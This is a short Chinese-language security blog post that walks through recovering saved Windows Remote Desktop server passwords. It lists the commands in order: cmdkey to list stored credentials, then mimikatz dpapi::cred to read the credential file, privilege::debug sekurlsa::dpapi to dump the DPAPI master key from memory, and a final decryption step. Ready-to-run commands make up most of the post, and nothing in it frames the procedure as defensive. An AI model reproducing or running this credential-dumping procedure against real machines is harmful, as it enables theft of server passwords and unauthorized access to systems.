当前位置: 首页 > 信息安全 > 正文

利用mimikat查看服务器密码

Mr.linus 发表于2017年12月11日 17:09

0x01凭据管理器中查看Windows凭据:TERMSRV/1xx.xxx.xxx.xx2

可通过命令行获取,执行: cmdkey /list

注意:该命令务必在Session会话下执行,system下执行无结果。

0x02凭据存储在用户目录下:

C:Users<username>AppDataLocalMicrosoftCredentials*

图中名为"FF359429D6F19C64BA7D3E282558EEB5"的文件即为目标凭据:TERMSRV/1xx.xxx.xxx.xx2的存储文件

0x03执行:

mimikatz "dpapi::cred /in:C:Usersxx AppDataLocalMicrosoftCredentialsFF 359429D6F19C64BA7D3E282558EEB5"

pbData是凭据的加密数据,guidMasterKey是凭据的GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}

0x04执行:

mimikatz privilege::debug sekurlsa::dpapi

根据目标凭据GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}找到其关联的MasterKey,这个MasterKey就是加密凭据的密钥,即解密pbData所必须的东西。

0x05 拿到了MasterKey,服务器密码便唾手可得。执行解密命令:

mimikatz "dpapi::cred /in:C:Usersxx AppDataLocalMicrosoftCredentialsFF 359429D6F19C64BA7D3E282558EEB5 /masterkey:28d1f3252c019f9cxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxx16dcec8e5dbf5cd0"

解密出来的CredentialBlob即为凭据TERMSRV/1xx.xxx.xxx.xx2的服务器密码。

参考:

http://www.freebuf.com/articles/network/146460.html

全文完
本文标签: mimikat破解远程终端凭据服务器密码
本文标题: 利用mimikat查看服务器密码
本文链接: http://www.90qj.com/m/?post=456

〓 随机文章推荐

共有5479阅 / 0我要评论
  1. 还没有评论呢,快抢沙发~

发表你的评论吧返回顶部

!评论内容需包含中文


请勾选本项再提交评论